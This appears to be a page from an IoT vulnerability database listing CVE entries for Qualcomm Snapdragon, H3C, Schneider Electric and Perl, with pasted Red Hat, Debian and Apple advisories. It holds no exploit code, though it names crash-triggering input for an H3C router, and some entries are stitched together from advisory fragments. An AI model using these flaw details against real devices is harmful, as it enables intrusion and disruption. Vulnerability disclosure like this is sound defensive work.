VARIoT IoT vulnerabilities database
| VAR-201901-0410 | CVE-2017-18332 | plural snapdragon Information disclosure vulnerability in products |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Security keys are logged when any WCDMA call is configured or reconfigured in snapdragon automobile, snapdragon mobile and snapdragon wear in versions MDM9607, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SDA660, SDX20, SXR1130. snapdragon automobile , snapdragon mobile , snapdragon wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9607 and others are products of Qualcomm (Qualcomm). The Qualcomm MDM9607 is a central processing unit (CPU). SDX24 is a modem. An information disclosure vulnerability exists in WCDMA in several Qualcomm products due to the program logging security keys when WCDMA calls are configured or reconfigured
| VAR-201901-0413 | CVE-2017-18322 | Snapdragon Mobile and Snapdragon Wear Vulnerable to information disclosure |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Cryptographic key material leaked in WCDMA debug messages in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 800, SD 810, SD 820, SD 835, Snapdragon_High_Med_2016. Snapdragon Mobile and Snapdragon Wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564
| VAR-201901-0445 | CVE-2017-11004 | plural Snapdragon Access control vulnerabilities in products |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
A non-secure user may be able to access certain registers in snapdragon automobile, snapdragon mobile and snapdragon wear in versions IPQ8074, MDM9206, MDM9607, MDM9635M, MDM9650, MDM9655, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 650/52, SD 810, SD 820, SD 820A, SD 835, SDA660, SDM439, SDM630, SDM660, SDX24, Snapdragon_High_Med_2016. Snapdragon Automobile , Snapdragon Mobile , Snapdragon Wear Contains an access control vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm IPQ8074 and others are products of Qualcomm (Qualcomm). The Qualcomm IPQ8074 is a central processing unit (CPU). SDX24 is a modem. An information disclosure vulnerability exists in Core in several Qualcomm products
| VAR-201901-0412 | CVE-2017-18321 | snapdragon mobile Vulnerable to information disclosure |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Security keys used by the terminal and NW for a session could be leaked in snapdragon mobile in versions MDM9650, MDM9655, SD 835, SDA660. snapdragon mobile Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564
| VAR-201901-0415 | CVE-2017-18324 | Snapdragon Mobile and Snapdragon Wear Vulnerable to information disclosure |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Cryptographic key material leaked in debug messages - GERAN in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 800, SD 810, SD 820, SD 835, SD 855, SDX24, Snapdragon_High_Med_2016. Snapdragon Mobile and Snapdragon Wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9206, etc. are the central processing unit (CPU) products of Qualcomm (Qualcomm) applied to different platforms. An information disclosure vulnerability exists in GERAN in several Qualcomm products. An attacker could exploit this vulnerability to disclose encrypted key material in GERAN debug messages
| VAR-201901-0416 | CVE-2017-18326 | Snapdragon Mobile and Snapdragon Wear Vulnerable to information disclosure |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Cryptographic keys are printed in modem debug messages in snapdragon mobile and snapdragon wear in versions MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 636, SD 650/52, SD 800, SD 810, SD 820, SD 835, SDA660, SDM630, SDM660, Snapdragon_High_Med_2016. Snapdragon Mobile and Snapdragon Wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9206, etc. are the central processing unit (CPU) products of Qualcomm (Qualcomm) applied to different platforms. Modem is one of the modems. Modems in several Qualcomm products have security vulnerabilities. The vulnerability stems from the fact that the program prints the key in the debug information
| VAR-201901-1321 | CVE-2018-3595 | plural snapdragon Product error handling vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Anti-rollback can be bypassed in replay scenario during app loading due to improper error handling of RPMB writes in snapdragon automobile, snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, MDM9650, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SDA660, SDX24, SXR1130. snapdragon automobile , snapdragon mobile , snapdragon wear Contains an error handling vulnerability.Information may be tampered with. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). The Qualcomm MDM9206 is a central processing unit (CPU). SDX24 is a modem. TrustZone is one of the system security components. A security vulnerability exists in TrustZone in several Qualcomm products due to improper handling of errors. Attackers can exploit this vulnerability to bypass the anti-rollback protection mechanism
| VAR-201812-1300 | No CVE | H3C ER2100n Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
H3C ER2100n is an enterprise-class router.
H3C ER2100n has a denial of service vulnerability. All UPnP methods of this router can be accessed without authorization. When the UPnP method's input parameters contain "<< \ x00" characters, the UPnP service will crash. At this time, manual restart is required to restore the UPnP service. An attacker could exploit this vulnerability to cause a denial of service.
| VAR-201811-0564 | CVE-2018-7807 | Data Center Expert Path traversal vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Data Center Expert, versions 7.5.0 and earlier, allows for the upload of a zip file from its user interface to the server. A carefully crafted, malicious file could be mistakenly uploaded by an authenticated user via this feature which could contain path traversal file names. As such, it could allow for the arbitrary upload of files contained with the zip onto the server file system outside of the intended directory. This is leveraging the more commonly known ZipSlip vulnerability within Java code. Data Center Expert Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Schneider Electric StruxureWare Data Center Expert is a set of centralized data center infrastructure management software from Schneider Electric (France). The software collects and distributes critical alerts, surveillance videos, and critical information, and supports a unified view of the physical infrastructure environment from anywhere on the network.
Schneider Electric StruxureWare Data Center Expert has a security vulnerability
| VAR-201811-0563 | CVE-2018-7806 | Data Center Operation Path traversal vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Data Center Operation allows for the upload of a zip file from its user interface to the server. A carefully crafted, malicious file could be mistakenly uploaded by an authenticated user via this feature which could contain path traversal file names. As such, it could allow for the arbitrary upload of files contained with the zip onto the server file system outside of the intended directory. This is leveraging the more commonly known ZipSlip vulnerability within Java code. Data Center Operation Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Schneider Electric StruxureWare Data Center Operation is a set of data center operation software from Schneider Electric of France. The software provides an instant overview of data center operations through inventory management, PUE calculations, real-time device alerts, and in-depth location-based analysis.
Schneider Electric StruxureWare Data Center Operation has a security vulnerability
| VAR-201812-0271 | CVE-2018-18311 | Perl Buffer error vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Perl before 5.26.3 and 5.28.x before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations. Perl Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. 7) - noarch, x86_64
3.
For the stable distribution (stretch), these problems have been fixed in
version 5.24.1-3+deb9u5.
We recommend that you upgrade your perl packages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: perl security update
Advisory ID: RHSA-2019:0109-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2019:0109
Issue date: 2019-01-21
CVE Names: CVE-2018-18311
=====================================================================
1. Summary:
An update for perl is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, noarch, ppc64le, s390x
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x
3. Description:
Perl is a high-level programming language that is commonly used for system
administration utilities and web programming.
Security Fix(es):
* perl: Integer overflow leading to buffer overflow in Perl_my_setenv()
(CVE-2018-18311)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Red Hat would like to thank the Perl project for reporting this issue.
Upstream acknowledges Jayakrishna Menon as the original reporter.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
perl-5.16.3-294.el7_6.src.rpm
noarch:
perl-CPAN-1.9800-294.el7_6.noarch.rpm
perl-ExtUtils-CBuilder-0.28.2.6-294.el7_6.noarch.rpm
perl-ExtUtils-Embed-1.30-294.el7_6.noarch.rpm
perl-ExtUtils-Install-1.58-294.el7_6.noarch.rpm
perl-IO-Zlib-1.10-294.el7_6.noarch.rpm
perl-Locale-Maketext-Simple-0.21-294.el7_6.noarch.rpm
perl-Module-CoreList-2.76.02-294.el7_6.noarch.rpm
perl-Module-Loaded-0.08-294.el7_6.noarch.rpm
perl-Object-Accessor-0.42-294.el7_6.noarch.rpm
perl-Package-Constants-0.02-294.el7_6.noarch.rpm
perl-Pod-Escapes-1.04-294.el7_6.noarch.rpm
x86_64:
perl-5.16.3-294.el7_6.x86_64.rpm
perl-Time-Piece-1.20.1-294.el7_6.x86_64.rpm
perl-core-5.16.3-294.el7_6.x86_64.rpm
perl-debuginfo-5.16.3-294.el7_6.i686.rpm
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-devel-5.16.3-294.el7_6.i686.rpm
perl-devel-5.16.3-294.el7_6.x86_64.rpm
perl-libs-5.16.3-294.el7_6.i686.rpm
perl-libs-5.16.3-294.el7_6.x86_64.rpm
perl-macros-5.16.3-294.el7_6.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-tests-5.16.3-294.el7_6.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
perl-5.16.3-294.el7_6.src.rpm
noarch:
perl-CPAN-1.9800-294.el7_6.noarch.rpm
perl-ExtUtils-CBuilder-0.28.2.6-294.el7_6.noarch.rpm
perl-ExtUtils-Embed-1.30-294.el7_6.noarch.rpm
perl-ExtUtils-Install-1.58-294.el7_6.noarch.rpm
perl-IO-Zlib-1.10-294.el7_6.noarch.rpm
perl-Locale-Maketext-Simple-0.21-294.el7_6.noarch.rpm
perl-Module-CoreList-2.76.02-294.el7_6.noarch.rpm
perl-Module-Loaded-0.08-294.el7_6.noarch.rpm
perl-Object-Accessor-0.42-294.el7_6.noarch.rpm
perl-Package-Constants-0.02-294.el7_6.noarch.rpm
perl-Pod-Escapes-1.04-294.el7_6.noarch.rpm
x86_64:
perl-5.16.3-294.el7_6.x86_64.rpm
perl-Time-Piece-1.20.1-294.el7_6.x86_64.rpm
perl-core-5.16.3-294.el7_6.x86_64.rpm
perl-debuginfo-5.16.3-294.el7_6.i686.rpm
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-devel-5.16.3-294.el7_6.i686.rpm
perl-devel-5.16.3-294.el7_6.x86_64.rpm
perl-libs-5.16.3-294.el7_6.i686.rpm
perl-libs-5.16.3-294.el7_6.x86_64.rpm
perl-macros-5.16.3-294.el7_6.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-tests-5.16.3-294.el7_6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
perl-5.16.3-294.el7_6.src.rpm
noarch:
perl-CPAN-1.9800-294.el7_6.noarch.rpm
perl-ExtUtils-CBuilder-0.28.2.6-294.el7_6.noarch.rpm
perl-ExtUtils-Embed-1.30-294.el7_6.noarch.rpm
perl-ExtUtils-Install-1.58-294.el7_6.noarch.rpm
perl-IO-Zlib-1.10-294.el7_6.noarch.rpm
perl-Locale-Maketext-Simple-0.21-294.el7_6.noarch.rpm
perl-Module-CoreList-2.76.02-294.el7_6.noarch.rpm
perl-Module-Loaded-0.08-294.el7_6.noarch.rpm
perl-Object-Accessor-0.42-294.el7_6.noarch.rpm
perl-Package-Constants-0.02-294.el7_6.noarch.rpm
perl-Pod-Escapes-1.04-294.el7_6.noarch.rpm
ppc64:
perl-5.16.3-294.el7_6.ppc64.rpm
perl-Time-Piece-1.20.1-294.el7_6.ppc64.rpm
perl-core-5.16.3-294.el7_6.ppc64.rpm
perl-debuginfo-5.16.3-294.el7_6.ppc.rpm
perl-debuginfo-5.16.3-294.el7_6.ppc64.rpm
perl-devel-5.16.3-294.el7_6.ppc.rpm
perl-devel-5.16.3-294.el7_6.ppc64.rpm
perl-libs-5.16.3-294.el7_6.ppc.rpm
perl-libs-5.16.3-294.el7_6.ppc64.rpm
perl-macros-5.16.3-294.el7_6.ppc64.rpm
ppc64le:
perl-5.16.3-294.el7_6.ppc64le.rpm
perl-Time-Piece-1.20.1-294.el7_6.ppc64le.rpm
perl-core-5.16.3-294.el7_6.ppc64le.rpm
perl-debuginfo-5.16.3-294.el7_6.ppc64le.rpm
perl-devel-5.16.3-294.el7_6.ppc64le.rpm
perl-libs-5.16.3-294.el7_6.ppc64le.rpm
perl-macros-5.16.3-294.el7_6.ppc64le.rpm
s390x:
perl-5.16.3-294.el7_6.s390x.rpm
perl-Time-Piece-1.20.1-294.el7_6.s390x.rpm
perl-core-5.16.3-294.el7_6.s390x.rpm
perl-debuginfo-5.16.3-294.el7_6.s390.rpm
perl-debuginfo-5.16.3-294.el7_6.s390x.rpm
perl-devel-5.16.3-294.el7_6.s390.rpm
perl-devel-5.16.3-294.el7_6.s390x.rpm
perl-libs-5.16.3-294.el7_6.s390.rpm
perl-libs-5.16.3-294.el7_6.s390x.rpm
perl-macros-5.16.3-294.el7_6.s390x.rpm
x86_64:
perl-5.16.3-294.el7_6.x86_64.rpm
perl-Time-Piece-1.20.1-294.el7_6.x86_64.rpm
perl-core-5.16.3-294.el7_6.x86_64.rpm
perl-debuginfo-5.16.3-294.el7_6.i686.rpm
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-devel-5.16.3-294.el7_6.i686.rpm
perl-devel-5.16.3-294.el7_6.x86_64.rpm
perl-libs-5.16.3-294.el7_6.i686.rpm
perl-libs-5.16.3-294.el7_6.x86_64.rpm
perl-macros-5.16.3-294.el7_6.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):
Source:
perl-5.16.3-294.el7_6.src.rpm
aarch64:
perl-5.16.3-294.el7_6.aarch64.rpm
perl-Time-Piece-1.20.1-294.el7_6.aarch64.rpm
perl-core-5.16.3-294.el7_6.aarch64.rpm
perl-debuginfo-5.16.3-294.el7_6.aarch64.rpm
perl-devel-5.16.3-294.el7_6.aarch64.rpm
perl-libs-5.16.3-294.el7_6.aarch64.rpm
perl-macros-5.16.3-294.el7_6.aarch64.rpm
noarch:
perl-CPAN-1.9800-294.el7_6.noarch.rpm
perl-ExtUtils-CBuilder-0.28.2.6-294.el7_6.noarch.rpm
perl-ExtUtils-Embed-1.30-294.el7_6.noarch.rpm
perl-ExtUtils-Install-1.58-294.el7_6.noarch.rpm
perl-IO-Zlib-1.10-294.el7_6.noarch.rpm
perl-Locale-Maketext-Simple-0.21-294.el7_6.noarch.rpm
perl-Module-CoreList-2.76.02-294.el7_6.noarch.rpm
perl-Module-Loaded-0.08-294.el7_6.noarch.rpm
perl-Object-Accessor-0.42-294.el7_6.noarch.rpm
perl-Package-Constants-0.02-294.el7_6.noarch.rpm
perl-Pod-Escapes-1.04-294.el7_6.noarch.rpm
ppc64le:
perl-5.16.3-294.el7_6.ppc64le.rpm
perl-Time-Piece-1.20.1-294.el7_6.ppc64le.rpm
perl-core-5.16.3-294.el7_6.ppc64le.rpm
perl-debuginfo-5.16.3-294.el7_6.ppc64le.rpm
perl-devel-5.16.3-294.el7_6.ppc64le.rpm
perl-libs-5.16.3-294.el7_6.ppc64le.rpm
perl-macros-5.16.3-294.el7_6.ppc64le.rpm
s390x:
perl-5.16.3-294.el7_6.s390x.rpm
perl-Time-Piece-1.20.1-294.el7_6.s390x.rpm
perl-core-5.16.3-294.el7_6.s390x.rpm
perl-debuginfo-5.16.3-294.el7_6.s390.rpm
perl-debuginfo-5.16.3-294.el7_6.s390x.rpm
perl-devel-5.16.3-294.el7_6.s390.rpm
perl-devel-5.16.3-294.el7_6.s390x.rpm
perl-libs-5.16.3-294.el7_6.s390.rpm
perl-libs-5.16.3-294.el7_6.s390x.rpm
perl-macros-5.16.3-294.el7_6.s390x.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
perl-debuginfo-5.16.3-294.el7_6.ppc64.rpm
perl-tests-5.16.3-294.el7_6.ppc64.rpm
ppc64le:
perl-debuginfo-5.16.3-294.el7_6.ppc64le.rpm
perl-tests-5.16.3-294.el7_6.ppc64le.rpm
s390x:
perl-debuginfo-5.16.3-294.el7_6.s390x.rpm
perl-tests-5.16.3-294.el7_6.s390x.rpm
x86_64:
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-tests-5.16.3-294.el7_6.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):
aarch64:
perl-debuginfo-5.16.3-294.el7_6.aarch64.rpm
perl-tests-5.16.3-294.el7_6.aarch64.rpm
ppc64le:
perl-debuginfo-5.16.3-294.el7_6.ppc64le.rpm
perl-tests-5.16.3-294.el7_6.ppc64le.rpm
s390x:
perl-debuginfo-5.16.3-294.el7_6.s390x.rpm
perl-tests-5.16.3-294.el7_6.s390x.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
perl-5.16.3-294.el7_6.src.rpm
noarch:
perl-CPAN-1.9800-294.el7_6.noarch.rpm
perl-ExtUtils-CBuilder-0.28.2.6-294.el7_6.noarch.rpm
perl-ExtUtils-Embed-1.30-294.el7_6.noarch.rpm
perl-ExtUtils-Install-1.58-294.el7_6.noarch.rpm
perl-IO-Zlib-1.10-294.el7_6.noarch.rpm
perl-Locale-Maketext-Simple-0.21-294.el7_6.noarch.rpm
perl-Module-CoreList-2.76.02-294.el7_6.noarch.rpm
perl-Module-Loaded-0.08-294.el7_6.noarch.rpm
perl-Object-Accessor-0.42-294.el7_6.noarch.rpm
perl-Package-Constants-0.02-294.el7_6.noarch.rpm
perl-Pod-Escapes-1.04-294.el7_6.noarch.rpm
x86_64:
perl-5.16.3-294.el7_6.x86_64.rpm
perl-Time-Piece-1.20.1-294.el7_6.x86_64.rpm
perl-core-5.16.3-294.el7_6.x86_64.rpm
perl-debuginfo-5.16.3-294.el7_6.i686.rpm
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-devel-5.16.3-294.el7_6.i686.rpm
perl-devel-5.16.3-294.el7_6.x86_64.rpm
perl-libs-5.16.3-294.el7_6.i686.rpm
perl-libs-5.16.3-294.el7_6.x86_64.rpm
perl-macros-5.16.3-294.el7_6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
perl-debuginfo-5.16.3-294.el7_6.x86_64.rpm
perl-tests-5.16.3-294.el7_6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2018-18311
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXEYC0dzjgjWX9erEAQi+cg//SP5ltkBCVsa86sXT7nP94nQepzxwweEj
EC1T/sqSYhSYJcftiJdmcxJk9g4wOns39SNJuvsiiajYarJeIFjUq2TpX/lxL3Qe
YrrnZ2esaT+kTDPtCpzBoatZ6uSKZmAVBKmu1bQMmquRt6fbk9F3lWWzfUEfspuU
RxfJplbKlejPsAAEUA4URdoC8Jey1cbKgrDOxqOGH1ipZyVsW8jvrrCZxCLKkeRR
MyfngBxyTGld78ZoDipSMOInjs50Snh3xp+z4ZxPIpltaEiJHK9mbg5Psqvz8hZY
S7RMVK4qPPJwFuPLEKBBNtwFneNotq1Hz4Pj1f2YvjsTv56N+IwudLAdHK8bQBA8
mTRgSNbn8T/22U67d6Pa+T1hL/5xstbOM2Jtj5CD++Oqh84mh8ZhWYFafAdCu/RS
RRgSZIg3CCjS7C0y+to1BBNARWJm0ymko9NPVGW5anDvqCZfowbUEOe/t1suXbE9
pMJgi+p5JPJwWgA+PkYgeW60edGu1sobtV84QQtgUAjy6wgby2wHYPgJJVNt8TP8
6JkRCmHhbwjsreDy0v65oNWWwTsgUFzjl+KUk5nwh/JST6w+LjY/CCUTgTNyVQR3
ivFL/VNrTip4RQCASlWILYI95U0h+Fb1hL7xbQ5KevVNwS07MZdFhEcZWDTBj3Iw
KtRzQvqVeHM=
=kPNu
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 7.5) - ppc64, ppc64le, s390x, x86_64
3. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update
2019-002 High Sierra, Security Update 2019-002 Sierra
macOS Mojave 10.14.4, Security Update 2019-002 High Sierra,
Security Update 2019-002 Sierra are now available and
addresses the following:
AppleGraphicsControl
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8555: Zhiyi Zhang of 360 ESG Codesafe Team, Zhuo Liang and
shrek_wzw of Qihoo 360 Nirvan Team
Bom
Available for: macOS Mojave 10.14.3
Impact: A malicious application may bypass Gatekeeper checks
Description: This issue was addressed with improved handling of file
metadata.
CVE-2019-6239: Ian Moorhouse and Michael Trimm
CFString
Available for: macOS Mojave 10.14.3
Impact: Processing a maliciously crafted string may lead to a denial
of service
Description: A validation issue was addressed with improved logic.
CVE-2019-8516: SWIPS Team of Frifee Inc.
configd
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8552: Mohamed Ghannam (@_simo36)
Contacts
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2019-8511: an anonymous researcher
CoreCrypto
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher
DiskArbitration
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: An encrypted volume may be unmounted and remounted by a
different user without prompting for the password
Description: A logic issue was addressed with improved state
management.
CVE-2019-8522: Colin Meginnis (@falc420)
FaceTime
Available for: macOS Mojave 10.14.3
Impact: A user's video may not be paused in a FaceTime call if they
exit the FaceTime app while the call is ringing
Description: An issue existed in the pausing of FaceTime video. The
issue was resolved with improved logic.
CVE-2019-8550: Lauren Guzniczak of Keystone Academy
Feedback Assistant
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to gain root privileges
Description: A race condition was addressed with additional
validation.
CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs
Feedback Assistant
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to overwrite arbitrary
files
Description: This issue was addressed with improved checks.
CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs
file
Available for: macOS Mojave 10.14.3
Impact: Processing a maliciously crafted file might disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6237: an anonymous researcher
Graphics Drivers
Available for: macOS Mojave 10.14.3
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8519: Aleksandr Tarasikov (@astarasikov), Juwei Lin
(@panicaII) and Junzhi Lu of Trend Micro Research working with Trend
Micro's Zero Day Initiative
iAP
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher
IOGraphics
Available for: macOS Mojave 10.14.3
